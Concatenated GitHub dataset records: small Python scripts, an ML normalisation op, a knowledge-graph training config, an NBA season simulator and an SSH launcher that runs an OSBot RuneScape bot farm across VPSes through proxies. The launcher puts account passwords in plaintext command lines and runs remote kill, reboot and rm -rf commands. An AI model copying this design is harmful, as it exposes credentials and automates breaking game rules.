a==None:\r\n print('Game is tie')\r\nelif a:\r\n print('Congratulations! You Win')\r\nelse:\r\n print('You Lost')\r\n\r\n","repo_name":"kiranbandgar/Python-Projects","sub_path":"Stone Paper Scissor Game.py","file_name":"Stone Paper Scissor Game.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26107663775","text":"from typing import Any, Dict, Iterable, List, Union\n\nimport numpy as np\n\nfrom fastestimator.op.numpyop.numpyop import NumpyOp\nfrom fastestimator.util.traceability_util import traceable\n\n\n@traceable()\nclass Minmax(NumpyOp):\n \"\"\"Normalize data using the minmax method.\n\n Args:\n inputs: Key(s) of images to be modified.\n outputs: Key(s) into which to write the modified images.\n mode: What mode(s) to execute this Op in. For example, \"train\", \"eval\", \"test\", or \"infer\". To execute\n regardless of mode, pass None. To execute in all modes except for a particular one, you can pass an argument\n like \"!infer\" or \"!train\".\n ds_id: What dataset id(s) to execute this Op in. To execute regardless of ds_id, pass None. To execute in all\n ds_ids except for a particular one, you can pass an argument like \"!ds1\".\n epsilon: A small value to prevent numeric instability in the division.\n new_min: The desired minimum value after the minmax operation.\n new_max: The desired maximum value after the minmax operation.\n \"\"\"\n def __init__(self,\n inputs: Union[str, Iterable[str]],\n outputs: Union[str, Iterable[str]],\n mode: Union[None, str, Iterable[str]] = None,\n ds_id: Union[None, str, Iterable[str]] = None,\n epsilon: float = 1e-7,\n new_min: float = 0.0,\n new_max: float = 1.0):\n super().__init__(inputs=inputs, outputs=outputs, mode=mode, ds_id=ds_id)\n self.epsilon = epsilon\n self.new_min = new_min\n self.new_max = new_max\n self.in_list, self.out_list = True, True\n assert new_max > new_min, \"the new_max should be greater than new_min.\"\n\n def forward(self, data: List[np.ndarray], state: Dict[str, Any]) -> List[np.ndarray]:\n return [self._apply_minmax(elem) for elem in data]\n\n def _apply_minmax(self, data: np.ndarray) -> np.ndarray:\n data_max = np.max(data)\n data_min = np.min(data)\n data_rescaled = (data - data_min) / max((data_max - data_min), self.epsilon)\n data = data_rescaled * (self.new_max - self.new_min) + self.new_min\n return data.astype(np.float32)\n","repo_name":"fastestimator/fastestimator","sub_path":"fastestimator/op/numpyop/univariate/minmax.py","file_name":"minmax.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"31"} +{"seq_id":"35792029785","text":"import os\nimport time\nfrom logging import handlers, getLogger, DEBUG\nfrom random import seed, randint\n\nfrom gevent import spawn, sleep, joinall\nfrom pssh.clients.native.single import SSHClient\n\nimport constants\nfrom database import Settings\n\nimport traceback\n\n\ndef clear_old():\n while True:\n # print(\"Cleaning\")\n try:\n now = time.time()\n for filename in os.listdir('logs'):\n if os.path.getmtime(os.path.join('logs', filename)) < now - 12 * 60 * 60:\n if os.path.isfile(os.path.join('logs', filename)):\n try:\n os.remove(os.path.join('logs', filename))\n except OSError:\n # print('file is in use, skipping')\n pass\n except Exception as e:\n print(e)\n traceback.print_exc()\n sleep(15 * 60)\n # sleep(1)\n\n\nclass Launcher:\n\n def __init__(self, account_state, database):\n self.account_state = account_state\n self.database = database\n self.restarting = set()\n seed(1)\n spawn(clear_old)\n\n def check_should_restart(self, output_line):\n if constants.should_restart_members == output_line:\n return True, True\n elif constants.should_restart_free == output_line:\n return True, False\n elif constants.should_restart_any == output_line or \\\n output_line in constants.should_restart_messages or \\\n output_line.startswith('Bot exited with code') and not output_line.endswith('143') or \\\n output_line.startswith('[ERROR]') and output_line.endswith('Failed to load hooks!'):\n return True, None\n return False, None\n\n def read_output(self, output, logger, vps, account, script, launcher_settings):\n restart_flag = False\n bot_froze_flag = None\n for line in iter(output):\n try:\n if line.startswith('[STATUS UPDATE]'):\n self.account_state.set_status(account['username'], line[17:])\n continue\n # print(line)\n # print(line, file=file, flush=True)\n logger.debug(line)\n if restart_flag:\n continue\n should_restart, should_change_mem = self.check_should_restart(line)\n if should_restart:\n print('Received output signaling to restart {}: {}'.format(account['username'], line))\n restart_flag = True\n if should_change_mem is not None:\n self.database.update_account_members(account['username'], should_change_mem)\n account['members'] = should_change_mem\n self.restart(vps, account, script, launcher_settings)\n elif line.startswith('[INFO][') and line.endswith(': Started bot #1'):\n print('Got bot starting output for {}, starting timer'.format(account['username']))\n\n def func():\n sleep(120)\n if bot_froze_flag:\n print('Detected bot froze on initialization for {}, restarting: {}'\n .format(account['username'], output))\n self.restart(vps, account, script, launcher_settings)\n nonlocal restart_flag\n restart_flag = True\n\n bot_froze_flag = True\n spawn(func)\n elif bot_froze_flag is not None and bot_froze_flag:\n print('Detected output after bot initialization output for {}'.format(account['username']))\n bot_froze_flag = False\n except Exception as e:\n print(\"Error reading output for {}\".format(account['username']))\n print(e)\n traceback.print_exc()\n print('ending output read for {}'.format(account['username']))\n\n def run(self, vps, account, script, launcher_settings):\n def func():\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'], password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n print(\"Connected\")\n try:\n worlds = constants.member_worlds if account['members'] else constants.free_worlds\n settings = ['+{}~{}'.format(setting, value) for setting, value in script['settings'].items()]\n settings.append('+bond_accounts~{}'.format(launcher_settings['bond_accounts']))\n proxy_login = account if 'proxy_username' in account and account['proxy_username'] is not None \\\n else launcher_settings\n command = 'DISPLAY=:1 java -jar osbot.jar -allow norandoms,norender -login -autologin ' \\\n '-bot u:p:0000 ' \\\n '-proxy {}:{}:{}:{} ' \\\n '-script MMF_Farm:username~{}+password~{}+type~{}{} ' \\\n '-debug 0 -world {}'.format(account['proxy_ip'], account['proxy_port'],\n proxy_login['proxy_username'],\n proxy_login['proxy_password'],\n account['username'], account['password'],\n script['name'], ''.join(settings),\n worlds[randint(0, len(worlds) - 1)])\n print(command)\n self.account_state.set_account_start(account['username'])\n output = client.run_command(command)\n # log_file = open('logs/{}.txt'.format(account['username']), 'a')\n logger = getLogger(account['username'])\n logger.setLevel(DEBUG)\n handler = handlers.RotatingFileHandler('logs/{}.log'.format(account['username']),\n maxBytes=(10 ** 6) / 2, backupCount=2)\n logger.addHandler(handler)\n readers = [spawn(self.read_output, out, logger, vps, account, script, launcher_settings)\n for out in (output.stdout, output.stderr)]\n client.wait_finished(output.channel)\n self.account_state.set_account_end(account['username'])\n client.disconnect()\n joinall(readers)\n logger.removeHandler(handler)\n handler.close()\n except Exception as e:\n print('Exception starting account {} on {}'.format(account['username'], vps['ip']))\n print(e)\n traceback.print_exc()\n print('end main')\n\n print('Starting {} on {}'.format(account['username'], vps['ip']))\n return spawn(func)\n\n def run_all(self, vps_list_with_accounts, script, launcher_settings):\n sleep_time = self.database.get_setting(Settings.Launcher)['run_interval']\n for element in vps_list_with_accounts:\n def func(vps):\n for account in vps['accounts']:\n print('starting account: {}'.format(account))\n self.run(vps, account, script, launcher_settings)\n print(f'sleeping for {sleep_time}')\n sleep(sleep_time)\n\n spawn(func, element)\n\n def kill_all(self, vps_list):\n for element in vps_list:\n def func(vps):\n print(\"about to kill all on {}\".format(vps['ip']))\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'],\n password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n print(\"Connected\")\n command = 'pkill -f \"[j]ava.*osbot\"'\n print(command)\n output = client.run_command(command)\n client.wait_finished(output.channel)\n client.disconnect()\n print('end kill')\n\n spawn(func, element)\n\n def kill_one(self, vps, account, run_async=True):\n def func():\n print('about to kill {} on {}'.format(account['username'], vps['ip']))\n self.restarting.discard(account['username'])\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'],\n password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n print('connected')\n command = 'pkill -f \"[j]ava.*username~{}\\\\+password~{}\"' \\\n .format(account['username'], account['password'])\n output = client.run_command(command)\n client.wait_finished(output.channel)\n client.disconnect()\n print('end kill')\n\n if run_async:\n spawn(func)\n else:\n func()\n\n def restart(self, vps, account, script, launcher_settings):\n sleep_time = self.database.get_setting(Settings.Launcher)['run_interval']\n\n def func():\n self.kill_one(vps, account, run_async=False)\n self.restarting.add(account['username'])\n print(f'sleeping for {sleep_time}')\n sleep(sleep_time)\n if account['username'] not in self.restarting:\n return\n self.restarting.discard(account['username'])\n self.run(vps, account, script, launcher_settings)\n\n spawn(func)\n\n def update_files(self, groups, osbot_file=None, script_file=None):\n # for element in self.database.get_all_vps():\n def func(vps):\n print(\"about to update files on {}\".format(vps['ip']))\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'],\n password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n\n print('connected')\n\n if osbot_file is not None:\n try:\n channel = client.open_session()\n client.execute('rm -f osbot.jar', channel=channel)\n client.wait_finished(channel)\n print('sending osbot file')\n client.scp_send('osbot.jar', 'osbot.jar')\n sleep(5)\n except Exception as e:\n print(e)\n traceback.print_exc()\n\n if script_file is not None:\n try:\n channel = client.open_session()\n client.execute('rm -f OSBot/Scripts/script.jar', channel=channel)\n client.wait_finished(channel)\n print('sending script file')\n client.scp_send('script.jar', 'OSBot/Scripts/script.jar')\n sleep(5)\n except Exception as e:\n print(e)\n traceback.print_exc()\n\n print('Files sent')\n\n client.disconnect()\n\n joinall([spawn(func, vps) for vps in self.database.get_vps_for_groups(groups)])\n\n def reboot_all(self):\n def reboot(vps):\n print(\"about to reboot {}\".format(vps['ip']))\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'],\n password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n\n print('connected')\n try:\n channel = client.open_session()\n client.execute('sudo reboot', channel=channel)\n client.wait_finished(channel)\n except Exception as e:\n print(e)\n traceback.print_exc()\n print('finished')\n client.disconnect()\n vps_list = self.database.get_all_vps()\n for element in vps_list:\n spawn(reboot, element)\n\n def vnc_all(self):\n def vnc(vps):\n print(\"about to vnc {}\".format(vps['ip']))\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'],\n password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n\n print('connected')\n try:\n channel = client.open_session()\n client.execute('vncserver', channel=channel)\n client.wait_finished(channel)\n except Exception as e:\n print(e)\n traceback.print_exc()\n print('finished')\n client.disconnect()\n\n vps_list = self.database.get_all_vps()\n for element in vps_list:\n spawn(vnc, element)\n\n def remove_account_ages(self, vps_list):\n def remove_ages_from(vps):\n print(f'removing ages from {vps[\"ip\"]}')\n\n try:\n client = SSHClient(vps['ip'].strip(), user=vps['username'],\n password=vps['password'], port=vps['port'])\n except Exception as e:\n print(e)\n traceback.print_exc()\n return\n\n print('connected')\n try:\n channel = client.open_session()\n client.execute('rm -rf /home/burntish/OSBot/Data/camaro/mmf_farm', channel=channel)\n client.wait_finished(channel)\n except Exception as e:\n print(e)\n traceback.print_exc()\n print('finished')\n client.disconnect()\n\n [spawn(remove_ages_from, vps) for vps in vps_list]\n","repo_name":"mattandreas/Account-Manager","sub_path":"launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":14287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1954708091","text":"# Python program to find H.C.F of two numbers\n\n# define a function\ndef compute_hcf(x, y):\n hcf = 0\n# choose the smaller number\n if x > y:\n smaller = y\n else:\n smaller = x\n for i in range(1, smaller+1):\n if((x % i == 0) and (y % i == 0)):\n hcf = i \n return hcf\n\nif __name__ == \"__main__\":\n listof = [2,3,4,5,6]\n #num1 = 1 \n #num2 = 12\n res = 1\n for i in range(len(listof)-1):\n result = compute_hcf(listof[i], listof[i+1])\n if res < result:\n res = result\n\nprint(\"The H.C.F. is\", res)","repo_name":"Rinki8890/PythonTrial","sub_path":"AmazonCodeWork/GCD.py","file_name":"GCD.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9706870964","text":"from input_pipeline.yago_input_pipeline import train_dataflow, test_dataflow, profiling_dataflow, profiling_test_df\nfrom models.yago_convE_kb_model import YAGOConveMultimodel\nfrom train.yago_training import SingleGPUTrainer\nfrom test.test_runner import TestRunner\nfrom tensorpack import *\nimport numpy as np\nimport tensorflow as tf\n\n\nfiles = {\n \"train_S\": \"../assets/yago-processed/train_s.mdb\",\n \"train_N\": \"../assets/yago-processed/train_n.mdb\",\n \"train_I\": \"../assets/yago-processed/train_i.mdb\",\n \"train_D\": \"../assets/yago-processed/train_d.mdb\",\n \"test\": \"../assets/yago-processed/test.mdb\",\n \"meta\": \"../assets/yago-processed/meta.npy\"\n}\n\n\nmeta = np.load(files[\"meta\"]).item(0)\n\nhyperparams = {\n \"dtype\": tf.float32,\n \"id_dtype\": tf.int32,\n \"emb_dim\": 200,\n \"MLPLayers\": 2,\n \"GRULayers\": 2,\n \"CNNTextLayers\": 2,\n \"CNNTextDilation\": 2,\n \"CNNTextKernel\": 4,\n \"entity_size\": meta[\"maxentityid\"] + 1,\n \"relation_size\": len(meta[\"rel2id\"]) + 1,\n \"word_size\": len(meta[\"word2id\"]) + 1,\n \"normalize_e1\": False,\n \"normalize_relation\": False,\n \"normalize_e2\": False,\n \"test_normalize_e1\": False,\n \"test_normalize_relation\": False,\n \"test_normalize_e2\": False,\n \"regularization_coefficient\": 0.0,\n \"learning_rate\": 0.003,\n \"lr_decay\": 0.995,\n \"label_smoothing\": 0.1,\n \"batch_size\": 256,\n \"bias\": False,\n \"debug\": False,\n \"emb_keepprob\": 0.8,\n \"fm_keepprob\": 0.8,\n \"mlp_keepprob\": 0.7,\n \"enc_keepprob\": 0.9\n}\n\nutils.logger.set_logger_dir(\"./logs\", action=\"d\")\n\ncbs = [\n PeriodicCallback(TensorPrinter([\"loss\", \"lr\"]), every_k_steps=1000),\n TestRunner(\n test_dataflow(files[\"test\"], files[\"meta\"], 32),\n [ScalarStats(\"mrr\"), ScalarStats(\"hits_1\"), ScalarStats(\"hits_3\"), ScalarStats(\"hits_10\"),\n ScalarStats(\"label_smoothing\"), ScalarStats(\"inv_e2\")])\n]\n\nmonitors = [\n callbacks.ScalarPrinter(),\n callbacks.JSONWriter(),\n TFEventWriter(logdir=\"/mnt/data/log\", max_queue=5, flush_secs=2)\n]\n\ncfg = TrainConfig(\n model=YAGOConveMultimodel(hyperparams),\n data=train_dataflow(files[\"train_S\"], files[\"meta\"], hyperparams[\"batch_size\"], 300),\n max_epoch=200,\n steps_per_epoch=meta[\"train_size\"] // hyperparams[\"batch_size\"],\n monitors=monitors,\n callbacks=cbs\n)\n\ntrainer = SingleGPUTrainer(hyperparams)\n\nlaunch_train_with_config(cfg, trainer)\n","repo_name":"pouyapez/mkbe","sub_path":"MKBE/tasks/train_yago_kb.py","file_name":"train_yago_kb.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"31"} +{"seq_id":"22829858595","text":"class ProgressBar:\n\tdef __init__(self,msg,end,cnt,len,dc,pc):\n\t\tself.prefix = msg\n\t\tself.suffix = end\n\t\tself.total = int(cnt)\n\t\tself.length = int(len)\n\t\tself.doneChar = dc[:1]\n\t\tself.progChar = pc[:1]\n\t\tself.counter = 0\n\t\tself.complete = False\n\tdef push(self):\n\t\tself.counter += 1\n\t\tif self.complete == True:\n\t\t\treturn None\n\t\telif self.counter == self.total:\n\t\t\tsys.stdout.write(self.prefix+' | ['+(self.doneChar*self.length)+'] 100.00% ')\n\t\t\tsys.stdout.write('\\r\\n')\n\t\t\tself.end()\n\t\telse:\n\t\t\tsys.stdout.write(self.prefix+' | ['+self.indicator(self.percentage(self.counter))+'] '+format(float(self.percentage(self.counter))*100,'.3f')+'%')\n\t\t\tsys.stdout.write('\\r')\n\t\t\tsys.stdout.flush()\n\tdef percentage(self,c):\n\t\treturn c/self.total\n\tdef indicator(self,p):\n\t\tcurrLen = round((float(p))*self.length)\n\t\treturn (self.doneChar*currLen)+(self.progChar*(self.length-currLen))\n\tdef end(self):\n\t\tprint(self.suffix)\n\t\tself.complete = True\n\ndef setupConfig():\n\tos.chdir(os.path.dirname(__file__))\n\t\n\ttry: # Attempt to open the config file\n\t\topen(_CFGFILENAME,'r')\n\t\n\texcept FileNotFoundError: # There is no config file!\n\t\tprint('\\nNo config file found at {}'.format(_CFGFILENAME))\n\t\tprint('Default settings will be used.')\n\t\t\n\t\tsetupLoad(False) # Vars will be loaded from base defaults.\n\t\t\n\telse:\n\t\ttry: # Attempt to process the config file\n\t\t\t_CONFIG.read(_CFGFILENAME)\n\t\t\n\t\texcept configparser.ParsingError: # The file is corrupt.\n\t\t\tprint('\\nConfig file at {} is corrupt!'.format(_CFGFILENAME))\n\t\t\tprint('Default settings will be used.')\n\t\t\t\n\t\t\tsetupLoad(False) # Vars will be loaded from base defaults.\n\t\t\t\n\t\telse:\n\t\t\tglobal _CFGDATALOAD\n\t\t\t_CFGDATALOAD = True # Mark that the file is valid.\n\t\t\t\n\t\t\tsetupLoad(True) # Vars will be loaded from config data.\n\t\t\t\ndef setupLoad(t):\n\tif not t: # The config file did not load successfully\n\t\tfor key, val in zip(_SS_DEFAULTSETTINGKEYS, _SS_DEFAULTSETTINGVALS): # Iterate through the default keys and values\n\t\t\tglobals()[key] = val # Set variables as globals\n\t\n\telse:\n\t\t# Manually set all globals.\n\t\ttry:\n\t\t\tglobals()['_SS_DATASRC'] = _CONFIG['Project']['DataSource']\n\t\t\tglobals()['_SS_DATASRCFN'] = _CONFIG['Project']['DataSourceFile']\n\t\t\tglobals()['_SS_EXPORT'] = _CONFIG['Project']['FileName']\n\t\t\tglobals()['_SS_SIMCNT'] = abs(_CONFIG['Project'].getint('Simulate'))\n\t\t\tglobals()['_SS_DODOWNLD'] = _CONFIG['Project'].getboolean('DownloadFile')\n\t\t\tglobals()['_SS_SHOWPB'] = _CONFIG['Visual'].getboolean('ProgressBar')\n\t\t\tglobals()['_SS_NAME'] = _CONFIG['Visual']['Name']\n\t\t\tglobals()['_SS_SHOWOUTPUT'] = _CONFIG['Visual'].getboolean('ShowOutput')\n\t\t\tglobals()['_SS_TCREATE'] = _CONFIG['Build'].getint('TimestampCreate')\n\t\t\tglobals()['_SS_TUPDATE'] = _CONFIG['Build'].getint('TimestampUpdate')\n\t\t\tglobals()['_SS_BUILD'] = _CONFIG['Build']['VersionString']\n\t\t\tglobals()['_SS_PBCPROG'] = _CONFIG['Visual']['ProgBarIncompleteChar']\n\t\t\tglobals()['_SS_PBCCMPT'] = _CONFIG['Visual']['ProgBarDoneChar']\n\t\texcept KeyError as error:\n\t\t\tprint('A critical key in the configuration file is missing:\\n {}'.format(error))\n\t\t\texit()\n\ndef initWelcome():\n\tglobal _CFGDATALOAD # Load the global state for this variable.\n\t\n\t# From this point on, we will welcome the user and print the config data.\t\n\tif _CFGDATALOAD:\n\t\tprint('\\nWelcome to {}!'.format(_SS_NAME))\n\t\t\n\tprint('\\nThis program will simulate the remainder of the current NBA season a certain number of times. The results will be in a CSV file.')\n\t\n\tif _CFGDATALOAD:\n\t\tprint('\\nCreate Date\\t{}'.format(datetime.fromtimestamp(_SS_TCREATE, pytz.timezone('America/Denver')).isoformat()))\n\t\tprint('Update Date\\t{}'.format(datetime.fromtimestamp(_SS_TUPDATE, pytz.timezone('America/Denver')).isoformat()))\n\t\tprint('Version\\t\\t{}'.format(_SS_BUILD))\n\t\t\n\tprint('\\nData Source\\t{}'.format(_SS_DATASRC))\n\tprint('Data Source To\\t{}'.format(_SS_DATASRCFN))\n\tprint('File Name\\t{}'.format(_SS_EXPORT))\n\tprint('Simulations\\t{}'.format(_SS_SIMCNT))\n\tprint('Show Prog Bar\\t{}'.format(_SS_SHOWPB))\n\t\ndef updateDataSrc():\n\tif _SS_SHOWOUTPUT: # Gets initial start time for download\n\t\tprint('\\nPreparing download of data source.')\n\t\t\n\t\t_BEGINTIME = time.time()\n\t\t\n\t\tprint('Downloading data source ...')\n\t\n\ttry:\n\t\turllib.request.urlretrieve(_SS_DATASRC, _SS_DIRNAME+_SS_DATASRCFN)\n\t\n\texcept urllib.error.HTTPError as error: # Handle HTTP status codes\n\t\tprint('\\nThe file was unable to download:\\n[{}] {}'.format(error.code,error.reason))\n\t\texit()\n\t\t\n\texcept urllib.error.URLError as error: # Handle generic network errors\n\t\tprint('\\nThe file was unable to download correctly:\\n{}'.format(error.reason))\n\t\texit()\n\t\t\n\texcept PermissionError as error: # Most likely the file is open, preventing it from being written to. Could also be an attrib error.\n\t\tprint('\\nThe file appears to be open on your system! Close it!')\n\t\texit()\n\t\n\tif _SS_SHOWOUTPUT: # Gets end time for download and prints elapsed time & network speed.\n\t\t_ENDTIME = time.time()\n\t\t_ELAPSEDTIME = _ENDTIME-_BEGINTIME\n\t\t_FILESIZE = os.path.getsize(_SS_DIRNAME+_SS_DATASRCFN)\n\t\tprint('Download completed successfully. ({:.3f} seconds, {:.2f} kB/s)'.format(_ELAPSEDTIME,(_FILESIZE/_ELAPSEDTIME)/1024))\n\n'''\n\tCreates the volatile storage that will eventually be dumped to the csv file.\n\tRight now, all values are set to 0, because no simulations have yet occurred.\n\t\n\tIt also creates the list of games to simulate.\n'''\n\ndef createStorage():\n\tif _SS_SHOWPB:\n\t\t_PB_LISTS = ProgressBar('Creating volatile storage ...','Storage created!\\n',_SS_TEAMCOUNT,36,_SS_PBCCMPT,_SS_PBCPROG)\n\t\n\tfor s in _SS_ALLTEAMIDS: # Loop through all teams\n\t\t_TEAMWINS[s] = [0,0] # Idx 0 stores the current wins, Idx 1 stores the simulated wins per simulation.\n\t\t_SEEDPOS[s] = {\"1\":0,\"2\":0,\"3\":0,\"4\":0,\"5\":0,\"6\":0,\"7\":0,\"8\":0,\"9\":0,\"10\":0,\"11\":0,\"12\":0,\"13\":0,\"14\":0,\"15\":0} # Each key denotes a seed. The value is how many times that was simulated total.\n\t\t_WINTTL[s] = 0 # Stores the total simulated wins.\n\t\t_MINMAX[s] = [83,-1] # Idx 0 stores the minima wins, Idx 1 stores the maxima wins. The constant values are set to 83/-1 or -1/83 so the first season trial is able to modify the values correctly. \n\t\t\n\t\tif _SS_SHOWPB:\n\t\t\t_PB_LISTS.push()\n\n'''\n\tComputes ALL games that have been marked as completed. This function overrides date control.\n'''\n\ndef games2Sim():\n\tif _SS_SHOWPB:\n\t\t_PB_GMS2S = ProgressBar('Getting schedules ...','Schedules created!\\n',len(range(_FGIDXSSN,_CSVLINES)),36,_SS_PBCCMPT,_SS_PBCPROG)\n\n\tfor g in range(_FGIDXSSN,_CSVLINES):\n\t\tif str(_CSV['score1'][g]) == 'nan':\n\t\t\t_GAMES2SIM.append(g)\n\t\t\t\n\t\tif _SS_SHOWPB:\n\t\t\t_PB_GMS2S.push()\n\t\n'''\n\tProcesses the current win records of all teams by looping through played games.\n\tWin records are entered into the zeroth index per team key in _TEAMWINS.\n'''\n\ndef currentWinRecords():\n\tif _SS_SHOWPB:\n\t\t_PB_WINRC = ProgressBar('Processing win records ...','Win records processed!\\n',len(list(range(_FGIDXSSN, _FGIDXSIMDAY))),36,_SS_PBCCMPT,_SS_PBCPROG)\n\t\n\tfor w in range(_FGIDXSSN, _FGIDXSIMDAY): # Loop through all played games\n\t\tif int(_CSV['score1'][w]) > int(_CSV['score2'][w]): # Check if home team scored more than away team\n\t\t\t_TEAMWINS[_CSV['team1'][w]][0] += 1 # Yes, give the home team a win\n\t\telse:\n\t\t\t_TEAMWINS[_CSV['team2'][w]][0] += 1 # No, give the away team a win\n\t\t\n\t\tif _SS_SHOWPB:\n\t\t\t_PB_WINRC.push()\n\t\t\n'''\n\tControls the simulation of each season. There are several steps to the process for each individual season:\n\t\n\t1. Creates a random float for each game that is to be simulated.\n\t2. Checks if said float is greater than the win probability for the home team.\n\t3. If it is, then the away team won, and they are given a win.\n\t4. Otherwise, the home team won; they are given a win instead.\n\t5. Enters another function and begins to sort the data.\n\t6. After the data is sorted and the season completes, resets the data in order to simulate a brand new season.\n'''\n\ndef simulateIndividualSeason():\n\tif _SS_SHOWPB:\n\t\t_PB_SIMSS = ProgressBar('Simulating seasons ...','Seasons simulated!\\n',_SS_SIMCNT,36,_SS_PBCCMPT,_SS_PBCPROG)\n\t\n\tfor s in range(_SS_SIMCNT):\n\t\t_RANDOM = []\n\t\tfor rg in range(len(_GAMES2SIM)):\n\t\t\t_RANDOM.append(random()) # Create a random float for each game that is to be simulated.\n\t\tfor rn in range(len(_GAMES2SIM)):\n\t\t\tif _RANDOM[rn] > float(_CSV['carmelo_prob1'][_GAMES2SIM[rn]]): # Check who won the game\n\t\t\t\t_TEAMWINS[_CSV['team2'][_GAMES2SIM[rn]]][1] += 1 # Float greater than probability, so away team wins\n\t\t\telse:\n\t\t\t\t_TEAMWINS[_CSV['team1'][_GAMES2SIM[rn]]][1] += 1 # Float less than probability, so home team wins\n\t\t\n\t\tseasonDataSum(_TEAMWINS) # Sort & sum season data\n\t\t\n\t\tif _SS_SHOWPB:\n\t\t\t_PB_SIMSS.push()\n\t\t\t\n\t\tfor rs in range(len(_TEAMWINS)): # Reset the win values for the next season.\n\t\t\t_TEAMWINS[_SS_ALLTEAMIDS[rs]][1] = 0\n\ndef seasonDataSum(w):\n\t_WTEAM = {}\n\t_WSORT = {}\n\t_ETEAM = {}\n\t_ESORT = {}\n\t\n\tfor cs in range(_SS_TEAMCOUNT):\n\t\t_SSNWINS = w[_SS_ALLTEAMIDS[cs]][0] + w[_SS_ALLTEAMIDS[cs]][1]\n\t\tif _SS_CONFERENCE[cs]:\n\t\t\t_WTEAM[_SS_ALLTEAMIDS[cs]] = _SSNWINS\n\t\telse:\n\t\t\t_ETEAM[_SS_ALLTEAMIDS[cs]] = _SSNWINS\n\t\n\t# The following solution must be credited to Mark on StackOverflow. Thanks, Mark!\n\t# https://stackoverflow.com/a/2258273\n\t_WSORT = sorted(_WTEAM.items(), key=lambda x: x[1], reverse=True) # Sorts the WC teams by wins (returns a tuple)\n\t_ESORT = sorted(_ETEAM.items(), key=lambda x: x[1], reverse=True) # Sorts the EC teams by wins (returns a tuple)\n\t\n\t# Convert back to a dict\n\t_WSORT = dict(_WSORT)\n\t_ESORT = dict(_ESORT)\n\t\n\t# Add the current seed positions to the seed position master\n\tfor sp in range(_SS_TEAMSPERCONF):\n\t\t_SEEDPOS[list(_WSORT.keys())[sp]][str(sp+1)] += 1\n\t\t_SEEDPOS[list(_ESORT.keys())[sp]][str(sp+1)] += 1\n\t\n\t# Add the season win total to the win master\n\tfor wt in range(_SS_TEAMSPERCONF):\n\t\t_WINTTL[list(_WSORT.keys())[wt]] += _WSORT[list(_WSORT.keys())[wt]]\n\t\t_WINTTL[list(_ESORT.keys())[wt]] += _ESORT[list(_ESORT.keys())[wt]]\n\t\t\n\t# If the win count was an extreme, update the value in _MINMAX to reflect it.\n\t# This function will require some explaining.\n\tfor mm in _SS_ALLTEAMIDS:\n\t\tif _SS_CONFERENCE[_SS_ALLTEAMIDS.index(mm)] == 0: # Checks the conference. If true, then team mm is in the East.\n\t\t\tif _ESORT[list(_ESORT.keys())[list(_ESORT.keys()).index(mm)]] < _MINMAX[mm][0]: # Checks if the current wins is less than the minima.\n\t\t\t\t_MINMAX[mm][0] = _ESORT[list(_ESORT.keys())[list(_ESORT.keys()).index(mm)]] # Set the minima to the current wins.\n\t\t\tif _ESORT[list(_ESORT.keys())[list(_ESORT.keys()).index(mm)]] > _MINMAX[mm][1]: # Checks if the current wins is greater than the maxima. The reason elif is not used is because the first season has it being both the min/max.\n\t\t\t\t_MINMAX[mm][1] = _ESORT[list(_ESORT.keys())[list(_ESORT.keys()).index(mm)]] # Set the maxima to the current wins.\n\t\t\t\n\t\telse: # Team mm is in the West.\n\t\t\tif _WSORT[list(_WSORT.keys())[list(_WSORT.keys()).index(mm)]] < _MINMAX[mm][0]:\n\t\t\t\t_MINMAX[mm][0] = _WSORT[list(_WSORT.keys())[list(_WSORT.keys()).index(mm)]]\n\t\t\tif _WSORT[list(_WSORT.keys())[list(_WSORT.keys()).index(mm)]] > _MINMAX[mm][1]:\n\t\t\t\t_MINMAX[mm][1] = _WSORT[list(_WSORT.keys())[list(_WSORT.keys()).index(mm)]]\n\t\t\t\n\t\t\t\n\t\t\ndef blankFile():\n\ttry:\n\t\topen(_SS_DIRNAME+_SS_EXPORT,'w').close() # Blanks file for re-writing\n\t\n\texcept PermissionError: # Most likely the file is open, preventing it from being written to. Could also be an attrib error. Because data may have been processing for a while, we give an option to retry.\n\t\tprint('\\nThe file appears to be open on your system!')\n\t\tinput('Hit to attempt a re-write, or to cancel.')\n\t\tblankFile()\n\t\ndef writeCsv():\n\t_WINCOUNTS = []\n\t_ESORT = []\n\t_WSORT = []\n\t_LSORT = []\n\t\n\t_WINCOUNTS = sorted(_WINTTL.items(), key=lambda x: x[1], reverse=True) # Sorts all teams by total win count (returns a tuple)\n\t_WINCOUNTS = dict(_WINCOUNTS) # And... back to a dictionary.\n\t\n\tfor k in list(_WINCOUNTS.keys()): # Create the conference team lists that will appear in the csv file.\n\t\tif _SS_CONFERENCE[_SS_ALLTEAMIDS.index(k)]: # Team is in the West\n\t\t\t_WSORT.append(k)\n\t\telse: # Team is in the East\n\t\t\t_ESORT.append(k)\n\t_LSORT = _ESORT + _WSORT # Merge the conferences for the master list.\n\t\n\ttry:\n\t\twith open(_SS_DIRNAME+_SS_EXPORT,'a') as f: # Open the file as append.\n\t\t\tfor c in range(0,2): # Iterate for each conference.\n\t\t\t\tif not c: # Start with the East; the y-intercept for range is 0 (idx 0-14)\n\t\t\t\t\tnc = 